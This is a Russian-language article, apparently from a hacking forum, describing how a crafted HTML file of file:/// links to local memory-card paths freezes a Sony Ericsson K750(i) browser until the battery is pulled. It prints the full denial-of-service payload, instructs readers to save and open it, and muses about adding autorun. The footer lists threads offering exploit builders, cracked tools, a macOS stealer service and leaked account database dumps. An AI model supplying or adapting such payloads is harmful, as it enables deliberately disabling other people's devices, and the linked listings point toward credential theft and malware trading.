Статья exploit.k750.sonic

Admin

Администратор
В данном обзоре пойдет речь про то, как можно средствами телефона и обычного мобильного браузера определенной версии "повесить" телефон намертво!
Итак, начали!

Необходимые ресурсы:
Телефон Sony Ericsson K750(i) с любой прошивкой, где есть браузер SEMC (в данном случае используется прошивка R1CA021);
1 html-файл =)
Notepad++ или любой другой текстовый редактор.

Интро:
В один прекрасный летний день, я решил приукрасить один из своих первых сайтов, которые я тогды делал от балды с самыми дурацкими названиями)
И так как тогда еще у меня не было хорошего писишника, то все делалось с телефона Sony Ericsson K750(i) вручную...
И вот однажды, я задался думой, как же мне оптимизировать контент сайта так, чтобы быстрее и удобнее мне было его же загружать.
Ну и паралельно хотел под валидатор подвести страничку)))
И начал свой эксперимент, который закончился эпическим вином)

Суть:
А собака была зарыта в следующем: я начал редактировать html-файл, при этом часто замечал, что сайты подгружают ссылки и иногда контетн через <a href="URL">...</a> , и в принципе я делал то же самое, НО...
Меня пробила голову мысль "А что, если сделать то же самое, но через телефон? То бишь чтобы брало прямо с телефона?" =) При этом, я тогда от ейфории и адреналиныча напрочь забыл про то, что брать ничего не будет, ибо это треш,угар и содомия)))))
НО, мы же любим тестить все, пошло поехало) Решил я вставить такого вида шнягу: "...//Media files/webpage/saved_pages/content/..." через этот тег =)
Разумеется, что ни к чему толковому это не привело, кроме потерянного времени и моей всевозрастающей злости (привет Скайвокеру...).
Опытным путем через минут 15~30 я получил такого вида хрень, от которой мой телефон тупо ругался матом уголовника...: <a href="file:///card/MSSEMC/Media files/audio/Менеджер сайтов - wa_mp3/s.gif">
И страница открыта не была, но былы то ли белая страница, то ли мессага...
И вот, я решил уже от всей своей широты души напхать в файл побольше и по жоще... и в итоге телефон повис)
А конкретно я добавил следующее (имена сайтов был взяты от балды методом рандома с делением на ноль :lol2: ):
Код:
<a href="file:///card/MSSEMC/Media files/audio/Менеджер сайтов - wa_wml/s.gif"> <a href="/i.cgi?f=file:///card/MSSEMC/Media files/webpage/saved_pages/content/Менеджер сайтов - wa_wml/s.gif"> <p>&#x421;&#x430;&#x439;&#x442; dimonwap.wen.ru &#x431;&#x44b;&#x43b; &#x43d;&#x430;&#x439;&#x434;&#x435;&#x43d; &#x440;&#x43e;&#x431;&#x43e;&#x442;&#x43e;&#x43c; &#x438;&#x43b;&#x438; &#x434;&#x43e;&#x431;&#x430;&#x432;&#x43b;&#x435;&#x43d;      &#x432; &#x431;&#x430;&#x437;&#x443; &#x434;&#x430;&#x43d;&#x43d;&#x44b;&#x445; &#x432;&#x440;&#x443;&#x447;&#x43d;&#x443;&#x44e; 6.7.2007 &#x432; 1:0
&#x412;&#x44b; &#x43c;&#x43e;&#x436;&#x435;&#x442;&#x435; &#x43f;&#x43e;&#x441;&#x442;&#x430;&#x432;&#x438;&#x442;&#x44c; &#x43d;&#x430; &#x441;&#x430;&#x439;&#x442;:
&gt; <a href="file:///card/MSSEMC/Media files/audio/Менеджер сайтов - wa_mp3/s.gif">&#x424;&#x43e;&#x440;&#x43c;&#x443; &#x43f;&#x43e;&#x438;&#x441;&#x43a;&#x430;</a>
&gt; <a href="file:///card/MSSEMC/Media files/audio/Менеджер сайтов - wa_mp3/s.gif">&#x424;&#x43e;&#x440;&#x43c;&#x443; &#x43f;&#x43e;&#x438;&#x441;&#x43a;&#x430; &#x43f;&#x43e; &#x441;&#x430;&#x439;&#x442;&#x443; dimonwap.wen.ru</a>.
&gt; <a href="file:///card/MSSEMC/Media files/audio/Менеджер сайтов - wa_mp3/s.gif">&#x41a;&#x430;&#x440;&#x442;&#x438;&#x43d;&#x43a;&#x443;  &#x438;&#x43d;&#x434;&#x435;&#x43a;&#x441;&#x430; &#x446;&#x438;&#x442;&#x438;&#x440;&#x43e;&#x432;&#x430;&#x43d;&#x438;&#x44f; &#x441;&#x430;&#x439;&#x442;&#x430; vetalwap.wen.ru</a>
&#x41f;&#x43e;&#x441;&#x43c;&#x43e;&#x442;&#x440;&#x435;&#x442;&#x44c; &#x418;&#x426; &#x441;&#x430;&#x439;&#x442;&#x430; &#x432;&#x44b; &#x43c;&#x43e;&#x436;&#x435;&#x442;&#x435; <a href="file:///card/MSSEMC/Media files/audio/Менеджер сайтов - wa_mp3/s.gif">&#x437;&#x434;&#x435;&#x441;&#x44c;</a>.</p>

И таким образом, при открытии страницы браузер тупо вешает телефон намертво)))
Но, почему так происходит?
Обратимся к сабжу матчасти:

Описание

Задает адрес документа, на который следует перейти. Поскольку в качестве адреса ссылки может использоваться документ любого типа, то результат перехода по ссылке зависит от конечного файла. Так, архивы (файлы с расширением zip или rar) будут сохраняться на локальный диск. По умолчанию новый документ загружается в текущее окно браузера, однако это свойство можно изменить с помощью атрибута target.

Синтаксис - <a href="URL">...</a>

Обязательный атрибут - Обязателен для ссылок.

Значения

В качестве значения принимается полный или относительный путь к файлу.
Значение по умолчанию - Нет.

Но, так как у нас тут только абсолютные пути указаны, то брать будет именно по этому пути.
На тот момент, у меня действительно по этим путям был файл wa_wml/s.gif и wa_mp3/s.gif. И только в одном пути их не было)
Тут то я и понял, что браузер просто не может открыть несущесвующий файл!) То бишь, по данному адресу файла нету, и память по данномй адресу может быть забита чем угодно, а браузер просто этого не может проверить!)
И таким вот образом все и работает)
А теперь собственно подитожим, что же в результате мы получили:
Невалидный файл,заблоченный намертво телефон.
Что выяснили: браузер не проверяет доступность файла на диске, допускает неправильный формат записи ссылки.

Оценка риска

Ну что тут можно сказать? Телефон будет повешен намертво, батарея будет давать питание, но вы не сможете юзать телефон по прямому назначению)
Кнопка "Выкл" тоже не будет работать)))))
Панацея-только вытащить батарею и вставить)
Но если дописать авторан? Хм...
Так же, лочит телефон очень быстро, в течении пары секунд...
Но, так как мы преследуем чисто научный интерес, то мы не будет опускатся до уровня вандалов)
В качестве пруфа, ниже будет видео с демонстрацией работы данного сабжа)
"Красная кнопка нажата, ОГОНЬ)"
Запускать очень просто- просто сохраняем куда-нить наш файлик.html и просто запускаем его (нажимаем открыть). Всё!
Видеопруф
PoC

Удачки всем, всяческого блага и плюшек) Развивайтесь и не грешите)))
 
Похожие темы
Admin Статья RIG Exploit Kit - уязвимость при загрузке файлов Вирусология 0
Scam_Guard SCAMGUARD TEAM |MAC OS STEALER | .url / .lnk Exploit| NFT SCAM | ЛЕНДИНГИ ДЛЯ ВСЕХ | ВСЕМУ ОБУЧИМ Ищу работу. Предлагаю свои услуги. 0
NickelBlack Интересно Exploit Pack 13.04 cracked by CRTeam Готовый софт 5
АнАлЬнАя ЧуПаКаБрА EXPLOIT.IN DATABASE DUMP | MILLIONS OF ACCOUNTS! | 8.3GB WORTH OF COMBOS! Раздачи и сливы 6
M Интересно Cлив exploit Black list и Разборки 30
N Gr3eNoX Exploit Scanner V.6.0 -2019 New Уязвимости и взлом 1
T Termux и exploit eternalblue Полезные статьи 0
АнАлЬнАя ЧуПаКаБрА [Private Keeper] Exploit.in Brute/Checker Готовый софт 0
1 Word Silent Exploit Builder exe c doc! Готовый софт 3
S Office exploit builder excel/word Уязвимости и взлом 5
G [Слив] Office exploit builder excel/word Полезные статьи 4
P 0 day pdf exploit? Уязвимости и взлом 2
P 64-bit iOS kernel exploit <= 10.3.1, взлом ядра iOS Уязвимости и взлом 0
TarasGyska VMware Escape Exploit, CVE-2017-4901 Уязвимости и взлом 0
АнАлЬнАя ЧуПаКаБрА [2.2] UberBruTe - [c0d3d By Yulya ([email protected])] Готовый софт 1
A AntiDetect 7 Release 1 - [Cracked By PC-RET ([email protected])] Готовый софт 24
E Analog multiple exploit Builder v16.7.16 Cracked Вирусология 2
P CUPS Remote Code Execution exploit (CVE-2015-1158) Уязвимости и взлом 0
АнАлЬнАя ЧуПаКаБрА AntiDetect 7 Release 1 - [Cracked By PC-RET ([email protected])] Готовый софт 0
F Hunter Exploit Pack - поделка w0rm'a Уязвимости и взлом 0
K [email protected] крыса / [email protected] мошенник Black list и Разборки 2
Admin Phoenix Exploit Kit - RCE Уязвимости и взлом 0
Admin MS Word Exploit Вирусология 2

Название темы